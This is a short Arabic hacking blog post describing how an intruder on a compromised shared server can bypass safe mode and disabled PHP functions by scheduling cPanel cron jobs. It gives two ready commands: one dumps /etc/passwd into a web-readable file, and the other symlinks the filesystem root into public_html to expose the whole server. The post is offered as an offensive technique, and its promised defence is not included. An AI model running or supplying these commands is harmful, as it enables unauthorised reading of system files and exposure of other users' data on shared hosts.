bypass sec via Execute Command For cron jobs

سلام عليكم شباب

كيف الحال , مضى زمن طويل على تدوينات الهاكر ولا ادرجها في المدونة بسبب عدم اهتمامي الكبير في الهاكر هذا الفترة بسبب تركيزي على البرمجة وان شاء الله نرجع

مغزى الموضوع …بعض الاحيان لما تدخل سيرفر وتشاهد الحماية تقريبا فول اوبشن من السيف مود و الديسيبل فانكشنز وغيرها من الامور …وفي هذا الفترة الحمايات تطورت بعض الشيء وهناك اسلوب جديد في الحماية ..بعض الاشخاص يترك السيرفر حتى اذا كان عنده سي بنل .!!! وهذا اكبر خطأ الموضوع وما في تخطي الحمايات عن طريق الكرون جوبز وهي عن طريق هذا الاوامر

cd /home/user/public_html/; cat /etc/passwd>user.txt

cd /home/user/public_html/sec/; ln -sf / 1.txt

اعتقد الامر واضح ما يحتاج شرح صوري ومن هذا الامور وان شاء الله الدرس القادم طريقة حماية سيرفرك من هذا الثغرة

في امان الله

./Security-Mind